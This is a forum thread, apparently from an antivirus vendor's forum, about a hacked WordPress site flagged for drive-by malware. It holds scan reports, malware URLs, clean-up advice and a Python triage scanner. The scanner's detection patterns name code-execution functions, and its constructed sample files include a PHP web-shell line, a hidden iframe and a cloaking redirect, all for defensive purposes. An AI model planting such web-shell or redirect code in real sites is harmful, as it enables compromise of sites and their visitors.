I have already sent e-mail to avast! but still haven’t received any reply or resolution.
My site is: http://waycoolph.com
Would appreciate any feedback as to when this can be resolved.
Report 2011-03-25 03:14:14 (GMT 1)
Website waycoolph.com
Domain Hash 05a7d0a700e79d75c600a34c82b3951d
IP Address 75.127.114.52 [SCAN]
IP Hostname rs2.abstractdns.com
IP Country US (United States)
AS Number 16626
AS Name GNAXNET-AS - Global Net Access, LLC
Detections 3 / 21 (14 %)
Status DANGEROUS
Scanning site with: AMaDa CLEAN
Scanning site with: BrowserDefender DETECTED
Scanning site with: DNS-BH CLEAN
Scanning site with: DShield SDL CLEAN
Scanning site with: Google Diagnostic CLEAN
Scanning site with: hpHosts UNRATED
Scanning site with: joewein.de LLC CLEAN
Scanning site with: Malware Domain List CLEAN
Scanning site with: Malware Patrol CLEAN
Scanning site with: MyWOT DETECTED
Scanning site with: Norton SafeWeb DETECTED
Scanning site with: ParetoLogic URL Clearing House CLEAN
Scanning site with: PhishTank CLEAN
Scanning site with: SCUMWARE CLEAN
Scanning site with: SpamhausDBL CLEAN
Scanning site with: SURBL CLEAN
Scanning site with: Threat Log CLEAN
Scanning site with: TrendMicro Web Reputation CLEAN
Scanning site with: URIBL CLEAN
Scanning site with: Web Security Guard UNRATED
Scanning site with: ZeuS Tracker CLEAN
Norton safe Web http://safeweb.norton.com/report/show?url=http%3A%2F%2Fwaycoolph.com
and downloaded malware found at those locations indicated by Norton
PIC6757624499074533-JPG-www.facebook.com.exe
http://www.virustotal.com/file-scan/report.html?id=de06cdd4a3d579f05a0fb075b2216910eed3709a01672be68265ca2781d4b6ea-1301017964
So as I see it, avast detection/blocking is correct.
Nothing evident on http://www.selfseo.com/html_source_view.php
Seems a false positive…
Sorry… Still detected… What could it be?
Anything I can do to resolve this issue?
Report that you believe this to be a false positive detection by the Network Shield and ask for them to review the site again. Though the Network Shield malicious sites list is usually correct, and given the other detections, is it possible that your site has been hacked or had previously been subject to attack, etc.?
Check the links shown in the Norton safe Web link that Pondus gave and see if those urls “waycoolph.com/imagesne.php, etc.” exist.
A link to this topic might help.
I just deleted waycoolph.com/imagesne.php and an image file. Will that resolve the issue or will I still need to email avast!?
At first, I could not login via ftp because of an incorrect password. However, I did not make any password changes. I emailed the web host and they checked and said that there were no password changes done nor was there any hacking detected. Anyway, I changed the password and downloaded the php file and a jpeg file. The php file did not show any alert when I scanned via avast! but the image file did. I just deleted both files.
Status: Site still blocked even though the php and jpg files were deleted.
Hello,
This site is still infected. The problem is in hxxp://waycoolph.com/images771.exe?=fdgfdgh.
Best Regards
images771.exe - 19/43
http://www.virustotal.com/file-scan/report.html?id=542fc00f4384ed8bba7537f676162ba371f5005f672d572bc454da2e72cc0edb-1301043796
You are going to have to dig deeper, as it is pretty clear that your site has been hacked; otherwise how could this “waycoolph.com/imagesne.php, etc.” and the later infected file mentioned by Sirmer (from avast! Virus Labs team) have been placed there? Simply removing the infected files we mentioned is a short term thing, as it doesn’t resolve the underlying problem of how your site was hacked, see #### below.
I think you are going to have to let your host know that the site has probably been hacked, so at the very least you should change your administrative and ftp passwords to something a little stronger.
Hacked Sites - This is commonly down to old content management software being vulnerable, PHP, Joomla, Wordpress, SQL, etc. etc. See this example of a host’s response to a hacked site:
We have patched up the server and we found a weakness in PHP which was helping aid the compromise of some domains. We updated it, and changed some default settings to help prevent these coding compromises. The weaknesses were not server wide but rather just made it easier on a hacker to compromise individual end user accounts. I suggest the following clean up procedure for both your accounts:
Check all index pages for any signs of java script injected into their coding. On windows servers check any “default.aspx” or “default.cfm” pages as those are popular targets too.
Remove any “rogue” files or php scripts uploaded by the hackers into your account. Such scripts allowed them to make account wide changes, spam through your account, or spread their own .htaccess files through all of your domains in that end user.
Check all .htaccess files, as hackers like to load re-directs into them.
Change all passwords for that end user account. The cp password, the ftp password, and any ftp sub accounts. Make sure to use a “strong” password which includes upper case, lower case, numbers and NO COMPLETE WORDS OR NAMES!
This coupled with our server side changes should prevent any resurfacing of the hackers efforts. In some cases you may still have coding which allows for injection. All user input fields hidden or not should be hard coded, filtered, and sanitized before being handed off to php or a database which will prevent coding characters from being submitted and run through your software.
Also see, Tips for Cleaning & Securing Your Website, http://www.stopbadware.org/home/security.
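The host’s clean-up procedure quoted above (injected script in index pages, rogue PHP scripts, .htaccess redirects) can be turned into a first-pass triage scan of a downloaded copy of the web root. The script below is an added example written for this thread, not code from avast!, the host, or any scanner mentioned here; the sample files it writes, the domain names and the file names in it are constructed for the dry run, and the regular expressions are heuristics, so every hit is a lead to inspect by hand rather than a verdict.

```python
"""Triage scan of a web root for the indicators a hosting provider's
clean-up advice lists: script injected into index pages, rogue PHP
scripts, and redirects loaded into .htaccess.  Example code, not any
vendor's tool; all sample data below is constructed."""
import os
import re
import tempfile
from urllib.parse import urlparse

# Directories that should only hold static assets; a .php file here is a lead.
ASSET_DIRS = {"images", "img", "uploads", "cache", "tmp"}

# Obfuscation wrappers and user-controlled code execution typical of injected PHP.
PHP_SUSPECT = re.compile(
    r"eval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\("
    r"|preg_replace\s*\([^,]*/\w*e\w*['\"]\s*,"          # /e modifier: pattern eval
    r"|(assert|create_function|system|passthru|shell_exec)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)",
    re.IGNORECASE,
)

# Hidden iframes and obfuscated script writers commonly injected into index pages.
HTML_SUSPECT = re.compile(
    r"<iframe[^>]*(visibility\s*:\s*hidden|display\s*:\s*none|(width|height)\s*=\s*['\"]?0\b)"
    r"|document\.write\s*\(\s*unescape\s*\("
    r"|String\.fromCharCode\s*\((\s*\d+\s*,){10,}",
    re.IGNORECASE,
)


def htaccess_problems(text, own_hosts):
    """Return reasons a .htaccess body looks tampered with (redirects off-site)."""
    problems = []
    for line in text.splitlines():
        stripped = line.strip()
        if stripped.startswith("#"):
            continue
        # Redirects keyed on a search-engine referer are classic cloaking.
        if (re.match(r"RewriteCond\s+%\{HTTP_REFERER\}", stripped, re.I)
                and re.search(r"google|bing|yahoo", stripped, re.I)):
            problems.append("redirect conditioned on search-engine referer (cloaking)")
        if re.match(r"(RewriteRule|Redirect(Match|Permanent)?)\s", stripped, re.I):
            for tok in stripped.split():
                if tok.lower().startswith(("http://", "https://")):
                    host = (urlparse(tok).hostname or "").lower()
                    if host not in own_hosts:
                        problems.append(f"redirect to external host {host}")
    return problems


def scan_webroot(root, own_hosts):
    """Walk root and return sorted (relative_path, reason) findings."""
    own = {h.lower() for h in own_hosts}
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue
            lower = name.lower()
            if lower.endswith((".php", ".php5", ".phtml")):
                if any(d in ASSET_DIRS for d in rel.lower().split("/")[:-1]):
                    findings.append((rel, "php script inside a static-asset directory"))
                if PHP_SUSPECT.search(text):
                    findings.append((rel, "obfuscated eval / user-controlled code execution"))
            if lower.startswith("index.") or lower in ("default.aspx", "default.cfm"):
                if HTML_SUSPECT.search(text):
                    findings.append((rel, "hidden iframe or obfuscated script in index page"))
            if lower == ".htaccess":
                findings.extend((rel, why) for why in htaccess_problems(text, own))
    return sorted(findings)


def build_demo_site(base):
    """Write a CONSTRUCTED sample web root (not files from any real site)."""
    files = {
        "index.php": '<?php get_header(); ?>\n'
                     '<iframe src="http://bad.example/x" width="0" height="0"></iframe>\n',
        "about.php": "<?php echo 'clean page'; ?>\n",
        "images/img771.php": "<?php eval(base64_decode($_POST['p'])); ?>\n",
        "wp-content/themes/default/functions.php": "<?php add_action('init', 'theme_init'); ?>\n",
        ".htaccess": "RewriteEngine On\n"
                     "RewriteCond %{HTTP_REFERER} google\\.com [NC]\n"
                     "RewriteRule ^(.*)$ http://bad.example/landing [R=302,L]\n",
    }
    for rel, body in files.items():
        path = os.path.join(base, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return base


def run_demo():
    """Build the constructed site in a temp dir and scan it; returns the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_demo_site(tmp)
        return scan_webroot(tmp, ["example.com", "www.example.com"])


if __name__ == "__main__":
    for rel, reason in run_demo():
        print(f"{rel}: {reason}")
```

Point `scan_webroot` at a local copy of the site (downloaded over FTP after the password change, so the scan does not depend on the possibly compromised server) and pass the site’s own hostnames so legitimate self-redirects in .htaccess are not reported. The clean pages in the demo produce no findings, which is the property to check before trusting the output on a real tree.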
Hi waycoolph,
You will get a lot of info from the free sucuri scan. Go to http://sitecheck.sucuri.net/scanner/#
Site is blacklisted by Norton Safe Web as well,
Your Wordpress theme is vulnerable: htxp://waycoolph.com/wp-content/themes/default/
Wordpress internal path: /home/waycoolp/public_html/wp-content/themes/default/index.php
Wordpress version outdated: Upgrade required.
Threat report Norton Safe Web:
Total threats found: 6
Drive-By Downloads
Threats found: 5
Threat Name: HTTP Malicious Toolkit Variant Activity 12
Location: htxp://waycoolph.com/imagesne.php?=safdsdfgfdgfg
Threat Name: HTTP Malicious Toolkit Variant Activity 12
Location: htxp://waycoolph.com/imagesne.php?=d?=56768768678
Threat Name: HTTP Malicious Toolkit Variant Activity 12
Location: hxtp://waycoolph.com/imagesne.php?=j?=5tr4ytry
Threat Name: HTTP Malicious Toolkit Variant Activity 12
Location: htxp://waycoolph.com/imagesne.php?=
Threat Name: HTTP Malicious Toolkit Variant Activity 12
Location: htxp://waycoolph.com/imagesne.php?=y5et6wt
Viruses
Threats found: 1
Threat Name: Trojan.ADH.2
Location: htxp://waycoolph.com/imagesne.php
Your site was hacked with malicious software that has been intentionally mutated or morphed by attackers, and then hackers attempted to download exploits from a malicious toolkit which may compromise a computer through various vendor vulnerabilities.
polonus
Thanks for your help guys. I will try to follow the tips you have provided and see if I can resolve this problem of mine. Will post an update as soon as I can.
You’re welcome, good hunting.